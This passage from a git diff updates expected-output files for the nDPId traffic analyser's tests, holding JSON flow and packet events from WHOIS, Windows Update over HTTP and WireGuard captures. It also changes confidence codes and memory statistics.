0QHB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgUmVnaXN0cmFyIEFidXNlIENvbnRhY3QgUGhvbmU6ICsxLjIwMTM3NzU5NTINCiAgIERvbWFpbiBTdGF0dXM6IGNsaWVudFRyYW5zZmVyUHJvaGliaXRlZCBodHRwczovL2ljYW5uLm9yZy9lcHAjY2xpZW50VHJhbnNmZXJQcm9oaWJpdGVkDQogICBOYW1lIFNlcnZlcjogTlMyNS5FSUNSQS5ORVQNCiAgIE5hbWUgU2VydmVyOiBOUzI2LkVJQ1JBLk5FVA0KICAgRE5TU0VDOiB1bnNpZ25lZA0KICAgVVJMIG9mIHRoZSBJQ0FOTiBXaG9pcyBJbmFjY3VyYWN5IENvbXBsYWludCBGb3JtOiBodHRwczovL3d3dy5pY2Fubi5vcmcvd2ljZi8NCj4+PiBMYXN0IHVwZGF0ZSBvZiB3aG9pcyBkYXRhYmFzZTogMjAyMS0wNi0xMlQxNjowMDo1NlogPDw8DQoNCkZvciBtb3JlIGluZm9ybWF0aW9uIG9uIFdob2lzIHN0YXR1cyBjb2RlcywgcGxlYXNlIHZpc2l0IGh0dHBzOi8vaWNhbm4ub3JnL2VwcA0KDQpOT1RJQ0U6IFRoZSBleHBpcmF0aW9uIGRhdGUgZGlzcGxheWVkIGluIHRoaXMgcmVjb3JkIGlzIHRoZSBkYXRlIHRoZQ0KcmVnaXN0cmFyJ3Mgc3BvbnNvcnNoaXAgb2YgdGhlIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiBpbiB0aGUgcmVnaXN0cnkgaXMNCmN1cnJlbnRseSBzZXQgdG8gZXhwaXJlLiBUaGlzIGRhdGUgZG9lcyBub3QgbmVjZXNzYXJpbHkgcmVmbGVjdCB0aGUgZXhwaXJhdGlvbg0KZGF0ZSBvZiB0aGUgZG9tYWluIG5hbWUgcmVnaXN0cmFudCdzIGFncg=="} 02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2Mf8AAAtBonHwB4tHgqgP4AAK8\/hR0ribdStrBVQGAW06F4AAGVlbWVudCB3aXRoIHRoZSBzcG9uc29yaW5nDQpyZWdpc3RyYXIuICBVc2VycyBtYXkgY29uc3VsdCB0aGUgc3BvbnNvcmluZyByZWdpc3RyYXIncyBXaG9pcyBkYXRhYmFzZSB0bw0KdmlldyB0aGUgcmVnaXN0cmFyJ3MgcmVwb3J0ZWQgZGF0ZSBvZiBleHBpcmF0aW9uIGZvciB0aGlzIHJlZ2lzdHJhdGlvbi4NCg0KVEVSTVMgT0YgVVNFOiBZb3UgYXJlIG5vdCBhdXRob3JpemVkIHRvIGFjY2VzcyBvciBxdWVyeSBvdXIgV2hvaXMNCmRhdGFiYXNlIHRocm91Z2ggdGhlIHVzZSBvZiBlbGVjdHJvbmljIHByb2Nlc3NlcyB0aGF0IGFyZSBoaWdoLXZvbHVtZSBhbmQNCmF1dG9tYXRlZCBleGNlcHQgYXMgcmVhc29uYWJseSBuZWNlc3NhcnkgdG8gcmVnaXN0ZXIgZG9tYWluIG5hbWVzIG9yDQptb2RpZnkgZXhpc3RpbmcgcmVnaXN0cmF0aW9uczsgdGhlIERhdGEgaW4gVmVyaVNpZ24gR2xvYmFsIFJlZ2lzdHJ5DQpTZXJ2aWNlcycgKCJWZXJpU2lnbiIpIFdob2lzIGRhdGFiYXNlIGlzIHByb3ZpZGVkIGJ5IFZlcmlTaWduIGZvcg0KaW5mb3JtYXRpb24gcHVycG9zZXMgb25seSwgYW5kIHRvIGFzc2lzdCBwZXJzb25zIGluIG9idGFpbmluZyBpbmZvcm1hdGlvbg0KYWJvdXQgb3IgcmVsYXRlZCB0byBhIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiByZWNvcmQuIFZlcmlTaWduIGRvZXMgbm90DQpndWFyYW50ZWUgaXRzIGFjY3VyYWN5LiBCeSBzdWJtaXR0aW5nIGEgV2hvaXMgcXVlcnksIHlvdSBhZ3JlZSB0byBhYmlkZQ0KYnkgdGhlIGZvbGxvd2luZyB0ZXJtcyBvZiB1c2U6IFlvdSBhZ3JlZSB0aGF0IHlvdSBtYXkgdXNlIHRoaXMgRGF0YSBvbmx5DQpmb3IgbGF3ZnVsIHB1cnBvc2VzIGFuZCB0aGF0IHVuZGVyIG5vIGNpcmN1bXN0YW5jZXMgd2lsbCB5b3UgdXNlIHRoaXMgRGF0YQ0KdG86ICgxKSBhbGxvdywgZW5hYmxlLCBvciBvdGhlcndpc2Ugc3VwcG9ydCB0aGUgdHJhbnNtaXNzaW9uIG9mIG1hc3MNCnVuc29saWNpdGVkLCBjb21tZXJjaWFsIGFkdmVydGlzaW5nIG9yIHNvbGljaXRhdGlvbnMgdmlhIGUtbWFpbCwgdGVsZXBob25lLA0Kb3IgZmFjc2ltaWxlOyBvciAoMikgZW5hYmxlIGhpZ2ggdm9sdW1lLCBhdXRvbWF0ZWQsIGVsZWN0cm9uaWMgcHJvY2Vzc2VzDQp0aGF0IGFwcGx5IHRvIFZlcmlTaWduIChvciBpdHMgY29tcHV0ZXIgc3lzdGVtcykuIFRoZSBjb21waWxhdGlvbiwNCnJlcGFja2FnaW5nLA=="} -00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00913{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"thread_ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":23,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":4920,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1623517269021} @@ -30,9 +30,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881946 bytes -~~ total memory freed........: 5881946 bytes -~~ total allocations/frees...: 118154/118154 +~~ total memory allocated....: 6010064 bytes +~~ total memory freed........: 6010064 bytes +~~ total allocations/frees...: 120914/120914 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 2069 chars diff --git a/test/results/windowsupdate_over_http.pcap.out b/test/results/windowsupdate_over_http.pcap.out new file mode 100644 index 000000000..7be0fb513 --- /dev/null +++ b/test/results/windowsupdate_over_http.pcap.out @@ -0,0 +1,24 @@ +00474{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":94209,"flow_last_seen":94209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":94209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":94209,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":94209,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0zkVAAIAGQI8KAAIPl2NIfcKXAFAVLcI9AAAAAIAC+vDt3QAAAgQFtAEDAwgBAQQC"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":94216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":94216,"pkt":"CAAn5uVZUlQAEjUCCABFAAAs7dwAAEAGoQCXY0h9CgACDwBQwpcBAsoBFS3CPmAS\/\/9G0AAAAgQFtA=="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":94216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":94216,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozkxAAIAGQJQKAAIPl2NIfcKXAFAVLcI+AQLKAlAQ+vBjnAAA"} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":94209,"flow_last_seen":94216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":94216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.WindowsUpdate","breed":"Safe","category":"SoftwareUpdate"},"http": {"hostname":"151.99.72.125","url":"151.99.72.125\/data\/0783dedfb62fa709\/msedge.b.tlu.dl.delivery.mp.microsoft.com\/filestreamingservice\/files\/d1d060c0-7ece-4b96-9558-4bd0f2326040?P1=1652084683&P2=404&P3=2&P4=GtXnDMvssaTVZE%2bliGRNZPdTCGZcdK3lsfQhBycGI5on2dyQK7mRzg%2fAP%2fOuVTebtfWU%2bfL%2bVpkQ9bwhNwUDPA%3d%3d","code":0,"content_type":"","user_agent":"Microsoft-Delivery-Optimization\/10.0"}} +01314{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":94209,"flow_last_seen":94225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1919,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":94225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.WindowsUpdate","breed":"Safe","category":"Download"},"http": {"hostname":"151.99.72.125","url":"151.99.72.125\/data\/0783dedfb62fa709\/msedge.b.tlu.dl.delivery.mp.microsoft.com\/filestreamingservice\/files\/d1d060c0-7ece-4b96-9558-4bd0f2326040?P1=1652084683&P2=404&P3=2&P4=GtXnDMvssaTVZE%2bliGRNZPdTCGZcdK3lsfQhBycGI5on2dyQK7mRzg%2fAP%2fOuVTebtfWU%2bfL%2bVpkQ9bwhNwUDPA%3d%3d","code":206,"content_type":"application\/octet-stream","user_agent":"Microsoft-Delivery-Optimization\/10.0"}} +00916{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":94209,"flow_last_seen":94227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":14879,"flow_avg_l4_payload_len":743,"midstream":0,"thread_ts_msec":94227,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"151.99.72.125","src_port":49815,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.WindowsUpdate","breed":"Safe","category":"Download"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"windowsupdate_over_http.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":14879,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":94227} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 20/20 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 14879 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6004046 bytes +~~ total memory freed........: 6004046 bytes +~~ total allocations/frees...: 120901/120901 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 453 chars +~~ json string max len.......: 1319 chars +~~ json string avg len.......: 857 chars diff --git a/test/results/wireguard.pcap.out b/test/results/wireguard.pcap.out index 2e5a6ca43..455087dff 100644 --- a/test/results/wireguard.pcap.out +++ b/test/results/wireguard.pcap.out @@ -4,10 +4,10 @@ 01528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1563973554628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":1563973554628,"pkt":"OCxKuzMdABAY3q0FCABFAAM8FXkAADURYEKLosCdwKgADspsjRQDKLH1BAAAAL5AaY1rAAAAAAAAANUJ2VrXQI01RZfJr8PEwgZEhNNcu6x03VWSZ67dhAHHTWKcRpBFkk8NVHd\/C4D4pz\/puWqoUUxKuxxH6YlcxuxAvZFB0Na5O4CW6jEyMIx3UMKSHboRTInUKfs0ifRWz\/ah3LYVezBxxWAse8HA4hp9J+12MZT8TmyygIwyCCaeEvoUQjFc6leSZrAZpKnPNseLUtXq9seSkA+QHufBd5P\/nAxkid4Fwq057VLJqJcJvFJRIdSNrsUBNHlMd2O226LQDMo6+sXnZNRhM\/0lY6T99lZ2rtutA5g+LROCm\/BZLu+Ww0aOhZ9T5CPKvl1MXzbqDpHjEWohQohUG62HCabsLz2Pl6HJpafmxv\/xXmUvqTxvWO5iYVSI4YH0rzZVN3aVdPUxgXYG+W8rSU+st0bg\/OnAMZWFzotivj2mfqRsGMWV3egRFwhvlfe7Fuv0OvGM3s9ZvinFAlmQZqUDOt74G5zoedU\/69v6LWqjWqMgwmKLQ\/lMwt2MnS6hiTwk\/iqPpTIM8RYnxG13RvjKDr4JXT\/U7OnZL63BA8kKbkL5zeTL+gL4bvPs8T4bLqWJpX+KPgKK5qcCbrRIXtRaFjvffCmBHmxiams\/n7B6m2DssFWcjX1Ev1oBu1UMKN6t2aeneW6ZYl4Q+afpKmmTZbh75sYoA8rPXxM4Q6E\/CvQ8xKFJuG12US4vfj96Tg+HLqjTKQn0aT3tP\/WRrjoWHz5nOKAwY2ssdZ\/sOQ7Z4I975oMYqMkolPHC\/IQyZ00spefKrUv00QdKXcsmU90gzx2i\/XncJUiW6+cRr5y\/xIasdRDvxOeWrnEuyr4eneiO5Pi37MXP8f2E65R6K8EWKkhOt2QxypTL9OYJAB3d80dQUxikTgyJwcF9uQEqgJNA\/GZhO2rBxL\/P3ze0It5qd4umjz9rSz1Tj4x9V7iRrPWik7ncKTUF\/OLBOu3ao3EyUG8u2N+GMLh6DNMnc3AMj260R63yyZIj87BZpn+95duhzSfs8I4u6YbCy54JPpusEK7oluD\/Hy2\/DI77VPA2QYc="} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1563973554628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1563973554628,"pkt":"OCxKuzMdABAY3q0FCABFAACsFXoAADURYtGLosCdwKgADspsjRQAmIUlBAAAAL5AaY1sAAAAAAAAAApaAsrtXpH1hJEWMIaMon2Jp07DYKtFnos9KJ2dxNXsnPOlMw8teGIqqtQyAhfCvZKfSoj8FKmPC1PCtu8qqniK567s\/wF6cALr5IJXHXdFnmr1I94kKjzDU62XCT24xGedWrUZRek84+e2Fsx1lJJ6NR9cFgw9VnO9J77GX8hL"} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1563973554628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1563973554628,"pkt":"ABAY3q0FOCxKuzMdCABFAAB8LYcAAEARP\/TAqAAOi6LAnY0UymwAaNyeBAAAAG2mYV5wAAAAAAAAAAo35XrmOHswcilnP2QelKUcrUyMt+9zQAFDeYSUJyyw9BNkc7uq5jhjxm51P1MBuT08PEWRrzriFSk+BrqayZkHU3Oi+bUZJb76bMmarQhF"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1563973554628,"flow_last_seen":1563973554642,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1563973554642,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} -00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1654,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1653,"flow_first_seen":1563973554628,"flow_last_seen":1563973742644,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":464906,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1563973742644,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} -00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2391,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2390,"flow_first_seen":1563973554628,"flow_last_seen":1563973930443,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":632512,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973930443,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2399,"flow_first_seen":1563973554628,"flow_last_seen":1563973935842,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":633424,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973935842,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1563973554628,"flow_last_seen":1563973554642,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1563973554642,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1654,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1653,"flow_first_seen":1563973554628,"flow_last_seen":1563973742644,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":464906,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1563973742644,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2391,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2390,"flow_first_seen":1563973554628,"flow_last_seen":1563973930443,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":632512,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973930443,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2399,"flow_first_seen":1563973554628,"flow_last_seen":1563973935842,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":633424,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1563973935842,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","packets-captured":2399,"packets-processed":2399,"total-skipped-flows":0,"total-l4-payload-len":633424,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":2,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1563973935842} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2399/2399 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5939014 bytes -~~ total memory freed........: 5939014 bytes -~~ total allocations/frees...: 120513/120513 +~~ total memory allocated....: 6072648 bytes +~~ total memory freed........: 6072648 bytes +~~ total allocations/frees...: 123275/123275 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 1533 chars diff --git a/test/results/wow.pcap.out b/test/results/wow.pcap.out index a6ce3fe24..9f294d35f 100644 --- a/test/results/wow.pcap.out +++ b/test/results/wow.pcap.out @@ -7,30 +7,30 @@ 